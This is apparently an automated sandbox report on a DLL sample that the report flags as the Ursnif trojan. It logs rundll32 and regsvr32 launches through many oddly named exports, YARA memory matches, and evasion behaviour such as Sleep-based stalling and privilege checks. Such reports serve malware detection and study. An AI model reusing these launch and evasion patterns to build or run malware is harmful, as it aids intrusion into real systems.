Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Exequatur
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Meith
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Exequatur
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Meith
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DAC6F608-1264-11EC-90E5-ECF4BB570DC9}.dat
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF9BFE7BA6DBA411D3.TMP
Source: classification engine | Classification label: mal96.troj.evad.winDLL@64/163@14/7
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00EC757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00EC757F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00402143 push ecx; ret 0_2_00402153
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004020F0 push ecx; ret 0_2_004020F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECEAE5 push ds; retf 0_2_00ECEAEB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECE4C9 push ecx; ret 0_2_00ECE4CA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECAD50 push ecx; ret 0_2_00ECAD59
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECB10B push ecx; ret 0_2_00ECB11B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40397 push dword ptr [esp+0Ch]; ret 0_2_00E403AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40397 push dword ptr [esp+10h]; ret 0_2_00E403EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [ebp-0000027Ch]; ret 0_2_00E40231
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [ebp-00000284h]; ret 0_2_00E40284
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [esp+10h]; ret 0_2_00E40396
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40066 push dword ptr [ebp-0000027Ch]; ret 0_2_00E4009B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40005 push dword ptr [ebp-0000027Ch]; ret 0_2_00E40065
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E2143 push ecx; ret 2_2_005E2153
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E20F0 push ecx; ret 2_2_005E20F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8E4C9 push ecx; ret 2_2_00C8E4CA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8EAE5 push ds; retf 2_2_00C8EAEB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8AD50 push ecx; ret 2_2_00C8AD59
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8B10B push ecx; ret 2_2_00C8B11B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [ebp-0000027Ch]; ret 3_2_00BF0231
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [ebp-00000284h]; ret 3_2_00BF0284
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [esp+10h]; ret 3_2_00BF0396
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0397 push dword ptr [esp+0Ch]; ret 3_2_00BF03AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0397 push dword ptr [esp+10h]; ret 3_2_00BF03EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0066 push dword ptr [ebp-0000027Ch]; ret 3_2_00BF009B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0005 push dword ptr [ebp-0000027Ch]; ret 3_2_00BF0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970397 push dword ptr [esp+0Ch]; ret 5_2_009703AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970397 push dword ptr [esp+10h]; ret 5_2_009703EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [ebp-0000027Ch]; ret 5_2_00970231
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [ebp-00000284h]; ret 5_2_00970284
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [esp+10h]; ret 5_2_00970396
                      Source: qT9Qk5aKTk.dllStatic PE information: section name: (empty; reported for 7 sections)
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Found stalling execution ending in API Sleep call
                      Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleep
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep time: -1667865539s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep count: 224 > 30
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep time: -112000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00EC12D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C812D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00C812D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B312D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,10_2_04B312D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_054712D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_054712D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F412D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,17_2_04F412D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,29_2_052D12D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E403F0 mov eax, dword ptr fs:[00000030h]0_2_00E403F0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E40397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E4009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00E40469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00BF009C mov eax, dword ptr fs:[00000030h]
